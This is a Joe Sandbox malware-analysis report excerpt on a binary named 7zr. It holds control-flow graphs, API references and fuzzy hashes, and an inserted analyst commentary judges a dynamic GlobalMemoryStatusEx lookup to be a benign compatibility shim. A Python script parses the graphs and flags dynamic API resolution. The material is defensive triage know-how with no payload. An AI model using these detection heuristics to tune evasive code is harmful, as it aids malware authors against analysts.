                                              control_flow_graph 846 d26766-d26792 call d8fb10 EnterCriticalSection 849 d26794-d26799 call d2c7d7 846->849 850 d267af-d267b7 846->850 857 d2679e-d267ac 849->857 852 d267b9 call cf1f91 850->852 853 d267be-d267c3 850->853 852->853 855 d26892-d268a8 853->855 856 d267c9-d267d5 853->856 860 d26941 855->860 861 d268ae-d268b4 855->861 858 d26817-d2682f 856->858 859 d267d7-d267dd 856->859 857->850 864 d26873-d2687b 858->864 865 d26831-d26842 call cf1fa0 858->865 859->858 862 d267df-d267eb 859->862 866 d26943-d2695a 860->866 861->860 863 d268ba-d268c2 861->863 869 d267f3-d26801 862->869 870 d267ed 862->870 867 d26933-d2693f call d2c5cd 863->867 871 d268c4-d268e6 call cf1fa0 fputs 863->871 864->867 868 d26881-d26887 864->868 865->864 883 d26844-d2686c fputs call cf2201 865->883 867->866 868->867 873 d2688d 868->873 869->864 875 d26803-d26815 fputs 869->875 870->869 886 d268fb-d26917 call d04f2a call cf1fb3 call cf1e40 871->886 887 d268e8-d268f9 fputs 871->887 879 d2692e call cf1f91 873->879 881 d2686e call cf1fa0 875->881 879->867 881->864 883->881 889 d2691c-d26928 call cf1fa0 886->889 887->889 889->879
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 00D2676B
                                              • EnterCriticalSection.KERNEL32(00DB2938), ref: 00D26781
                                              • fputs.MSVCRT ref: 00D2680B
                                              • LeaveCriticalSection.KERNEL32(00DB2938), ref: 00D26944
                                                • Part of subcall function 00D2C7D7: fputs.MSVCRT ref: 00D2C840
                                              • fputs.MSVCRT ref: 00D26851
                                                • Part of subcall function 00CF2201: fputs.MSVCRT ref: 00CF221E
                                              • fputs.MSVCRT ref: 00D268D9
                                              • fputs.MSVCRT ref: 00D268F6
                                                • Part of subcall function 00CF1FA0: fputc.MSVCRT ref: 00CF1FA7
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmp
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: fputs$CriticalSection$EnterH_prologLeavefputc
                                              • String ID: v$Sub items Errors:
                                              • API String ID: 2670240366-2468115448
                                              • Opcode ID: b47773ea7ddd2cfadc4cac98671abee26ff5a7b2f67fef3840c66686b2d8ea88
                                              • Instruction ID: 6f23a3a6ee044bdd9e9437315250bdd505368be17a479ab41e41af06994bd90b
                                              • Opcode Fuzzy Hash: b47773ea7ddd2cfadc4cac98671abee26ff5a7b2f67fef3840c66686b2d8ea88
                                              • Instruction Fuzzy Hash: 02519C32501700CFCB259FA4E894AAAB7E2FF94314F58442EE59A97261CB31BC84DF65

                                              Control-flow Graph

                                              control_flow_graph 898 d26359-d26373 call d8fb10 901 d26375-d26385 call d2c7d7 898->901 902 d2639e-d263af call d25a4d 898->902 901->902 907 d26387-d2639b 901->907 908 d263b5-d263cd 902->908 909 d265ee-d265f1 902->909 907->902 912 d263d2-d263d4 908->912 913 d263cf 908->913 910 d265f3-d265fb 909->910 911 d26624-d2663c 909->911 914 d26601-d26607 call d28012 910->914 915 d266ea call d2c5cd 910->915 916 d26643-d2664b 911->916 917 d2663e call cf1f91 911->917 918 d263d6-d263d9 912->918 919 d263df-d263e7 912->919 913->912 928 d2660c-d2660e 914->928 927 d266ef-d266fd 915->927 916->915 924 d26651-d2668f fputs call cf211a call cf1fa0 call d28685 916->924 917->916 918->919 923 d264b1-d264bc call d26700 918->923 925 d26411-d26413 919->925 926 d263e9-d263f2 call cf1fa0 919->926 947 d264c7-d264cf 923->947 948 d264be-d264c1 923->948 924->927 981 d26691-d26697 924->981 929 d26442-d26446 925->929 930 d26415-d2641d 925->930 926->925 943 d263f4-d2640c call cf210c call cf1fa0 926->943 928->927 934 d26614-d2661f call cf1fa0 928->934 938 d26497-d2649f 929->938 939 d26448-d26450 929->939 935 d2642a-d2643b 930->935 936 d2641f-d26425 call d26134 930->936 934->915 935->929 936->935 938->923 944 d264a1-d264ac call cf1fa0 call cf1f91 938->944 949 d26452-d2647a fputs call cf1fa0 call cf1fb3 call cf1fa0 939->949 950 d2647f-d26490 939->950 943->925 944->923 956 d264d1-d264da call cf1fa0 947->956 957 d264f9-d264fb 947->957 948->947 955 d265a2-d265a6 948->955 949->950 950->938 964 d265da-d265e6 955->964 965 d265a8-d265b6 955->965 956->957 986 d264dc-d264f4 call cf210c call cf1fa0 956->986 961 d2652a-d2652e 957->961 962 d264fd-d26505 957->962 974 d26530-d26538 961->974 975 d2657f-d26587 961->975 971 d26512-d26523 962->971 972 d26507-d2650d call d26134 962->972 964->908 968 d265ec 964->968 976 d265d3 965->976 977 d265b8-d265ca call d26244 965->977 968->909 971->961 972->971 983 d26567-d26578 974->983 984 d2653a-d26562 fputs call cf1fa0 call cf1fb3 call cf1fa0 974->984 975->955 980 d26589-d26595 call cf1fa0 975->980 976->964 977->976 1001 d265cc-d265ce call cf1f91 977->1001 980->955 1003 d26597-d2659d call cf1f91 980->1003 991 d26699-d2669f 981->991 992 d266df-d266e5 call cf1f91 981->992 983->975 984->983 986->957 998 d266b3-d266ce call d04f2a call cf1fb3 call cf1e40 991->998 999 d266a1-d266b1 fputs 991->999 992->915 1004 d266d3-d266da call cf1fa0 998->1004 999->1004 1001->976 1003->955 1004->992
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 00D2635E
                                              • fputs.MSVCRT ref: 00D2645F
                                                • Part of subcall function 00D2C7D7: fputs.MSVCRT ref: 00D2C840
                                              • fputs.MSVCRT ref: 00D26547
                                              • fputs.MSVCRT ref: 00D2665F
                                              • fputs.MSVCRT ref: 00D266AE
                                                • Part of subcall function 00CF1F91: fflush.MSVCRT ref: 00CF1F93
                                                • Part of subcall function 00CF1FB3: __EH_prolog.LIBCMT ref: 00CF1FB8
                                                • Part of subcall function 00CF1E40: free.MSVCRT ref: 00CF1E44
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmp
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: fputs$H_prolog$fflushfree
                                              • String ID: Can't allocate required memory$ERRORS:$WARNINGS:
                                              • API String ID: 1750297421-1898165966
                                              • Opcode ID: 89ada80ab9359d8dc8c92dc2982214fad7433f29d6dd81dbaf20b3b81e04281e
                                              • Instruction ID: af817b0fcbfdfcd840e4b1e814c9e1daac2ae0907af6c4700fc7a94c6d1ae8cd
                                              • Opcode Fuzzy Hash: 89ada80ab9359d8dc8c92dc2982214fad7433f29d6dd81dbaf20b3b81e04281e
                                              • Instruction Fuzzy Hash: D2B18F30601715CFDB64EFA4D991BAAB7E1FF54308F08452DEA5A87291CB31ED44CB61

                                              Control-flow Graph

                                              control_flow_graph 1016 cf9c8f-cf9cc2 GetModuleHandleA GetProcAddress 1017 cf9cef-cf9d06 GlobalMemoryStatus 1016->1017 1018 cf9cc4-cf9ccc GlobalMemoryStatusEx 1016->1018 1020 cf9d0b-cf9d0d 1017->1020 1021 cf9d08 1017->1021 1018->1017 1019 cf9cce-cf9cd7 1018->1019 1022 cf9cd9 1019->1022 1023 cf9ce5 1019->1023 1024 cf9d11-cf9d15 1020->1024 1021->1020 1025 cf9cdb-cf9cde 1022->1025 1026 cf9ce0-cf9ce3 1022->1026 1027 cf9ce8-cf9ced 1023->1027 1025->1023 1025->1026 1026->1027 1027->1024
                                              APIs
                                              • GetModuleHandleA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx), ref: 00CF9CB3
                                              • GetProcAddress.KERNEL32(00000000), ref: 00CF9CBA
                                              • GlobalMemoryStatusEx.KERNELBASE(00000040), ref: 00CF9CC8
                                              • GlobalMemoryStatus.KERNEL32(?), ref: 00CF9CFA
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmp
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: GlobalMemoryStatus$AddressHandleModuleProc
                                              • String ID: $@$GlobalMemoryStatusEx$kernel32.dll
                                              • API String ID: 180289352-802862622
                                              • Opcode ID: 7e0d515e734129edbd591d7d67044894f106d64727031f36a0f63b99096bbeee
                                              • Instruction ID: fd9fe15af3c1e57a9155d377b987990e5807ff5129a800568401a3000ff0c06e
                                              • Opcode Fuzzy Hash: 7e0d515e734129edbd591d7d67044894f106d64727031f36a0f63b99096bbeee
                                              • Instruction Fuzzy Hash: 3E1123709103099BDF60EFA4D899BEDBBF8FB04305F200419E546A7284D778A984CB65
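The record above is the one concrete instance on this page of the "Contains functionality to dynamically determine API calls" behaviour listed in the report overview: block 1016 resolves GlobalMemoryStatusEx through GetModuleHandleA("kernel32.dll") and GetProcAddress, then branches to either GlobalMemoryStatusEx (block 1018, argument 0x40 = sizeof(MEMORYSTATUSEX)) or the legacy GlobalMemoryStatus (block 1017) when the export is absent. That is the ordinary compatibility shim for pre-Windows 2000 systems. With the snapshot file naming the image 7zr and the strings in the neighbouring records being 7-Zip console messages ("Warning: The archive is open with offset", "Can't allocate required memory", "Duplicate archive path:"), it is consistent with 7-Zip's own RAM-size query rather than an evasion primitive, so on its own it should not drive the verdict; the Defender-exclusion, thread-hiding and BreakOnTermination signatures in the overview are what deserve the analyst's attention.

The Python below is an added example, not Joe Sandbox or 7-Zip code. It parses the IDA-plugin edge list and the API-reference bullets exactly as they are printed in these records (the sample text is copied from this record) and flags the resolve-then-branch idiom mechanically, so the same check can be run over every function record in a report export. The node/edge grammar it assumes is inferred from the printed output and is not a documented format: a node is "<id> <start>[-<end>] <labels...>", an edge is "<src>-><dst>", and labels are an imported API name, "call <hex>" for an intra-module call, or "* N" repeating the previous call.

```python
"""Parse the control-flow-graph edge list and the API-reference bullets that
Joe Sandbox's IDA plugin prints for one function, and flag the
resolve-then-branch idiom (GetProcAddress in one block, the resolved API and a
fallback API in its successor blocks).

Added example, not Joe Sandbox or 7-Zip code.  The grammar below is inferred
from the printed report text, not from a documented format:
  node = '<id> <start>[-<end>] <label>...'  labels: API name | 'call <hex>' | '* N'
  edge = '<src>-><dst>'
Node ids are decimal; addresses are hex and, in this dump, always contain a-f,
so they cannot be confused with ids (assumption).
"""
import re
from collections import defaultdict

# Sample input, copied from this report's record for the function at 0xCF9C8F.
CFG_TEXT = (
    "control_flow_graph 1016 cf9c8f-cf9cc2 GetModuleHandleA GetProcAddress "
    "1017 cf9cef-cf9d06 GlobalMemoryStatus 1016->1017 "
    "1018 cf9cc4-cf9ccc GlobalMemoryStatusEx 1016->1018 "
    "1020 cf9d0b-cf9d0d 1017->1020 1021 cf9d08 1017->1021 1018->1017 "
    "1019 cf9cce-cf9cd7 1018->1019 1022 cf9cd9 1019->1022 1023 cf9ce5 1019->1023 "
    "1024 cf9d11-cf9d15 1020->1024 1021->1020 1025 cf9cdb-cf9cde 1022->1025 "
    "1026 cf9ce0-cf9ce3 1022->1026 1027 cf9ce8-cf9ced 1023->1027 1025->1023 "
    "1025->1026 1026->1027 1027->1024"
)
API_TEXT = """\
• GetModuleHandleA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx), ref: 00CF9CB3
• GetProcAddress.KERNEL32(00000000), ref: 00CF9CBA
• GlobalMemoryStatusEx.KERNELBASE(00000040), ref: 00CF9CC8
• GlobalMemoryStatus.KERNEL32(?), ref: 00CF9CFA
"""

EDGE_RE = re.compile(r"^(\d+)->(\d+)$")
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)


def parse_cfg(text):
    """Return (blocks, edges): blocks maps node id -> {start, end, calls}."""
    tokens = text.split()
    if tokens and tokens[0] == "control_flow_graph":
        tokens = tokens[1:]
    blocks, edges, cur, i = {}, set(), None, 0
    while i < len(tokens):
        tok = tokens[i]
        m = EDGE_RE.match(tok)
        if m:
            edges.add((int(m.group(1)), int(m.group(2))))
        elif tok.isdigit():                      # new node: id, then address range
            start, _, end = tokens[i + 1].partition("-")
            cur = blocks[int(tok)] = {"start": int(start, 16),
                                      "end": int(end or start, 16), "calls": []}
            i += 1
        elif tok == "call":                      # 'call <hex>': intra-module call
            cur["calls"].append("sub_" + tokens[i + 1].upper())
            i += 1
        elif tok == "*":                         # '* N': previous call repeated N times
            cur["calls"].extend([cur["calls"][-1]] * (int(tokens[i + 1]) - 1))
            i += 1
        else:                                    # bare identifier: imported API
            cur["calls"].append(tok)
        i += 1
    return blocks, edges


def parse_api_refs(text):
    """Parse '• API.MODULE(args), ref: ADDR' bullets; subcall bullets are tagged."""
    refs = []
    for line in text.splitlines():
        m = API_RE.match(line)
        if m:
            refs.append({"api": m["api"], "module": m["mod"],
                         "args": [a for a in (m["args"] or "").split(",") if a],
                         "ref": int(m["ref"], 16), "subcall_of": m["sub"]})
    return refs


def block_for(blocks, addr):
    """Node id whose address range contains addr, or None."""
    return next((b for b, r in blocks.items() if r["start"] <= addr <= r["end"]), None)


def find_dynamic_resolution(blocks, edges):
    """Blocks that call GetProcAddress and then branch.  Returns
    [(resolver_block, sorted imported APIs called in its successor blocks)]."""
    succ = defaultdict(set)
    for s, d in edges:
        succ[s].add(d)
    hits = []
    for bid, b in blocks.items():
        if "GetProcAddress" in b["calls"] and len(succ[bid]) >= 2:
            apis = sorted(api for s in succ[bid]
                          for api in blocks.get(s, {"calls": []})["calls"]
                          if not api.startswith("sub_"))
            hits.append((bid, apis))
    return hits


if __name__ == "__main__":
    blocks, edges = parse_cfg(CFG_TEXT)
    for bid, apis in find_dynamic_resolution(blocks, edges):
        b = blocks[bid]
        print(f"block {bid} ({b['start']:#x}-{b['end']:#x}) resolves an export; "
              f"successor blocks call: {', '.join(apis)}")
    for r in parse_api_refs(API_TEXT):
        print(f"{r['api']:>20}.{r['module']} @ {r['ref']:#x} "
              f"in block {block_for(blocks, r['ref'])}")
```

Run against the whole report export, a hit whose successor APIs are a same-named pair such as GlobalMemoryStatus / GlobalMemoryStatusEx is the benign compatibility shape; a hit whose successors are NtSetInformationThread, NtQuerySystemInformation or similar is the one to open in the debugger. The parser keeps intra-module calls as `sub_<addr>` so they can be cross-referenced with the "Part of subcall function" bullets, but excludes them from the API comparison.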

                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmp
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: _initterm$__getmainargs__p___initenv__p__commode__p__fmode__set_app_type
                                              • String ID:
                                              • API String ID: 4012487245-0
                                              • Opcode ID: 1b17769a4e5c1cf110f2ca4ee8b93bcfb34bdde6aeba88bd9563cd154b3c5fe9
                                              • Instruction ID: 946f8fbe74ea220a378df6e179af679a81201797b0a73da1f2ff7912f1f4f77a
                                              • Opcode Fuzzy Hash: 1b17769a4e5c1cf110f2ca4ee8b93bcfb34bdde6aeba88bd9563cd154b3c5fe9
                                              • Instruction Fuzzy Hash: 0B21F472900748EFCB11AFA4EC46BA9BBB8FB09720F14431AF615E23A1DB745444CB34

                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmp
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: _initterm$FilterXcpt__getmainargs__p___initenv__setusermatherr_controlfpexit
                                              • String ID:
                                              • API String ID: 279829931-0
                                              • Opcode ID: c1945b075e83ba22f7233a7b5649866c9b016258321cd486a6e054c1e29770c1
                                              • Instruction ID: fb5ecf65f800f83db28cc4b22f1976425b7ff325c13b0285e6c800566b33d374
                                              • Opcode Fuzzy Hash: c1945b075e83ba22f7233a7b5649866c9b016258321cd486a6e054c1e29770c1
                                              • Instruction Fuzzy Hash: 9001D3B2950708EFDF04AFA0EC46DEEBB79FB08300B10011AF906B2361DA759844CB30

                                              APIs
                                              • __EH_prolog.LIBCMT ref: 00D1185D
                                                • Part of subcall function 00D1021A: __EH_prolog.LIBCMT ref: 00D1021F
                                                • Part of subcall function 00D1062E: __EH_prolog.LIBCMT ref: 00D10633
                                              • _CxxThrowException.MSVCRT(?,00DA6010), ref: 00D11961
                                                • Part of subcall function 00D11AA5: __EH_prolog.LIBCMT ref: 00D11AAA
                                              Strings
                                              • Duplicate archive path:, xrefs: 00D11A8D
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmp
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: H_prolog$ExceptionThrow
                                              • String ID: Duplicate archive path:
                                              • API String ID: 2366012087-4000988232
                                              • Opcode ID: 1444e412240914eb33e2ba7d93162361de1dd24212469533a12406418a3e49f8
                                              • Instruction ID: ce7479ae39311aaa471b29a06a64a56c58819c36030fd551acbcf257b28d8203
                                              • Opcode Fuzzy Hash: 1444e412240914eb33e2ba7d93162361de1dd24212469533a12406418a3e49f8
                                              • Instruction Fuzzy Hash: A1814835D00158EBCF15EFA4E891AEDBBB5EF18310F1440A9E612632A2DF30AE45DB71

                                              Control-flow Graph

                                              control_flow_graph 1520 d3f1b2-d3f1ce call d8fb10 call d01168 1524 d3f1d3-d3f1d5 1520->1524 1525 d3f1db-d3f1e4 call d3f3e4 1524->1525 1526 d3f36a-d3f378 1524->1526 1529 d3f1e6-d3f1e8 1525->1529 1530 d3f1ed-d3f1f2 1525->1530 1529->1526 1531 d3f203-d3f21a 1530->1531 1532 d3f1f4-d3f1f9 1530->1532 1535 d3f231-d3f248 memcpy 1531->1535 1536 d3f21c-d3f22c _CxxThrowException 1531->1536 1532->1531 1533 d3f1fb-d3f1fe 1532->1533 1533->1526 1537 d3f24c-d3f257 1535->1537 1536->1535 1538 d3f259 1537->1538 1539 d3f25c-d3f25e 1537->1539 1538->1539 1540 d3f281-d3f299 1539->1540 1541 d3f260-d3f26f 1539->1541 1549 d3f311-d3f313 1540->1549 1550 d3f29b-d3f2a0 1540->1550 1542 d3f271 1541->1542 1543 d3f279-d3f27b 1541->1543 1544 d3f273-d3f275 1542->1544 1545 d3f277 1542->1545 1543->1540 1546 d3f315-d3f318 1543->1546 1544->1543 1544->1545 1545->1543 1548 d3f357-d3f368 1546->1548 1548->1526 1549->1548 1550->1546 1551 d3f2a2-d3f2b5 call d3f37b 1550->1551 1555 d3f2f0-d3f30c memmove 1551->1555 1556 d3f2b7-d3f2cf call d8e1a0 1551->1556 1555->1537 1559 d3f2d1-d3f2eb call d3f37b 1556->1559 1560 d3f31a-d3f355 memcpy 1556->1560 1559->1556 1564 d3f2ed 1559->1564 1560->1548 1564->1555
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmp
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID:
                                              • API String ID: 3519838083-0
                                              • Opcode ID: a461cc2b60e2135933284db7856cc4ec02d5e8c28b9765974116d8c0d3c4b187
                                              • Instruction ID: 2ec879674d9035bada4cc38b2ab5013376848cab60b9da1bd6ed6467b3cfa91e
                                              • Opcode Fuzzy Hash: a461cc2b60e2135933284db7856cc4ec02d5e8c28b9765974116d8c0d3c4b187
                                              • Instruction Fuzzy Hash: 1D514C7AE003099FDB14DFA4C8C5BAEB3B5FF88354F188429E901AB241D7B4A9058B70

                                              Control-flow Graph

                                              control_flow_graph 1565 cf6c72-cf6c8e call d8fb10 1568 cf6c96-cf6c9e 1565->1568 1569 cf6c90-cf6c94 1565->1569 1571 cf6ca6-cf6cae 1568->1571 1572 cf6ca0-cf6ca4 1568->1572 1569->1568 1570 cf6cd3-cf6cdc call cf8664 1569->1570 1578 cf6d87-cf6d92 call cf88c6 1570->1578 1579 cf6ce2-cf6d02 call cf67f0 call cf2f88 call cf87df 1570->1579 1571->1570 1574 cf6cb0-cf6cb5 1571->1574 1572->1570 1572->1571 1574->1570 1576 cf6cb7-cf6cce call cf67f0 call cf2f88 1574->1576 1591 cf715d-cf715f 1576->1591 1586 cf6f4c-cf6f62 call cf87fa 1578->1586 1587 cf6d98-cf6d9e 1578->1587 1604 cf6d4a-cf6d61 call cf7b41 1579->1604 1605 cf6d04-cf6d09 1579->1605 1599 cf6f67-cf6f74 call cf85e2 1586->1599 1600 cf6f64-cf6f66 1586->1600 1587->1586 1590 cf6da4-cf6dc7 call cf2e47 * 2 1587->1590 1612 cf6dc9-cf6dcf 1590->1612 1613 cf6dd4-cf6dda 1590->1613 1597 cf7118-cf7126 1591->1597 1614 cf6f76-cf6f7c 1599->1614 1615 cf6fd1-cf6fd8 1599->1615 1600->1599 1617 cf6d67-cf6d6b 1604->1617 1618 cf6d63-cf6d65 1604->1618 1605->1604 1609 cf6d0b-cf6d38 call cf9252 1605->1609 1609->1604 1624 cf6d3a-cf6d45 1609->1624 1612->1613 1619 cf6ddc-cf6def call cf2407 1613->1619 1620 cf6df1-cf6df9 call cf3221 1613->1620 1614->1615 1623 cf6f7e-cf6f8a call cf6bf5 1614->1623 1621 cf6fda-cf6fde 1615->1621 1622 cf6fe4-cf6feb 1615->1622 1626 cf6d6d-cf6d75 1617->1626 1627 cf6d78 1617->1627 1625 cf6d7a-cf6d82 call cf764c 1618->1625 1619->1620 1638 cf6dfe-cf6e0b call cf87df 1619->1638 1620->1638 1621->1622 1630 cf70e5-cf70ea call cf6868 1621->1630 1631 cf701d-cf7024 call cf8782 1622->1631 1632 cf6fed-cf6ff7 call cf6bf5 1622->1632 1623->1630 1641 cf6f90-cf6f93 1623->1641 1624->1591 1652 cf7116 1625->1652 1626->1627 1627->1625 1643 cf70ef-cf70f3 1630->1643 1631->1630 1649 cf702a-cf7035 1631->1649 1632->1630 1647 cf6ffd-cf7000 1632->1647 1654 cf6e0d-cf6e10 1638->1654 1655 cf6e43-cf6e50 call cf6c72 1638->1655 1641->1630 1648 cf6f99-cf6fb6 call cf67f0 call cf2f88 1641->1648 1650 cf710c 1643->1650 1651 cf70f5-cf70f7 1643->1651 1647->1630 1656 cf7006-cf701b call cf67f0 1647->1656 1685 cf6fb8-cf6fbd 1648->1685 1686 cf6fc2-cf6fc5 call cf717b 1648->1686 1649->1630 1658 cf703b-cf7044 call cf8578 1649->1658 1660 cf710e-cf7111 call cf6848 1650->1660 1651->1650 1659 cf70f9-cf7102 1651->1659 1652->1597 1661 cf6e1e-cf6e36 call cf67f0 1654->1661 1662 cf6e12-cf6e15 1654->1662 1680 cf6f3a-cf6f4b call cf1e40 * 2 1655->1680 1681 cf6e56 1655->1681 1676 cf6fca-cf6fcc 1656->1676 1658->1630 1679 cf704a-cf7054 call cf717b 1658->1679 1659->1650 1667 cf7104-cf7107 call cf717b 1659->1667 1660->1652 1683 cf6e58-cf6e7e call cf2f1c call cf2e04 1661->1683 1684 cf6e38-cf6e41 call cf2fec 1661->1684 1662->1655 1669 cf6e17-cf6e1c 1662->1669 1667->1650 1669->1655 1669->1661 1676->1660 1695 cf7056-cf705f call cf2f88 1679->1695 1696 cf7064-cf7097 call cf2e47 call cf1089 * 2 call cf6868 1679->1696 1680->1586 1681->1683 1703 cf6e83-cf6e99 call cf6bb5 1683->1703 1684->1683 1685->1686 1686->1676 1705 cf7155-cf7158 call cf6848 1695->1705 1727 cf70bf-cf70cc call cf6bf5 1696->1727 1728 cf7099-cf70af wcscmp 1696->1728 1711 cf6ecf-cf6ed1 1703->1711 1712 cf6e9b-cf6e9f 1703->1712 1705->1591 1717 cf6f09-cf6f35 call cf1e40 * 2 call cf6848 call cf1e40 * 2 1711->1717 1714 cf6ec7-cf6ec9 SetLastError 1712->1714 1715 cf6ea1-cf6eae call cf22bf 1712->1715 1714->1711 1724 cf6ed3-cf6ed9 1715->1724 1725 cf6eb0-cf6ec5 call cf1e40 call cf2e04 1715->1725 1717->1652 1729 cf6eec-cf6f07 call cf31e5 1724->1729 1730 cf6edb-cf6ee0 1724->1730 1725->1703 1742 cf70ce-cf70d1 1727->1742 1743 cf7129-cf7133 call cf67f0 1727->1743 1733 cf70bb 1728->1733 1734 cf70b1-cf70b6 1728->1734 1729->1717 1730->1729 1736 cf6ee2-cf6ee8 1730->1736 1733->1727 1740 cf7147-cf7154 call cf2f88 call cf1e40 1734->1740 1736->1729 1740->1705 1748 cf70d8-cf70e4 call cf1e40 1742->1748 1749 cf70d3-cf70d6 1742->1749 1759 cf713a 1743->1759 1760 cf7135-cf7138 1743->1760 1748->1630 1749->1743 1749->1748 1763 cf7141-cf7144 1759->1763 1760->1763 1763->1740
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 00CF6C77
                                              • SetLastError.KERNEL32(00000002,-00000050,0000000F,-00000038,:$DATA,?,00000000,?), ref: 00CF6EC9
                                                • Part of subcall function 00CF6C72: wcscmp.MSVCRT ref: 00CF70A5
                                                • Part of subcall function 00CF6BF5: __EH_prolog.LIBCMT ref: 00CF6BFA
                                                • Part of subcall function 00CF6BF5: GetFileAttributesW.KERNEL32(?,?,?,00000000,?), ref: 00CF6C1A
                                                • Part of subcall function 00CF6BF5: GetFileAttributesW.KERNEL32(?,00000000,?,?,00000000,?), ref: 00CF6C49
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmp
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: AttributesFileH_prolog$ErrorLastwcscmp
                                              • String ID: :$DATA
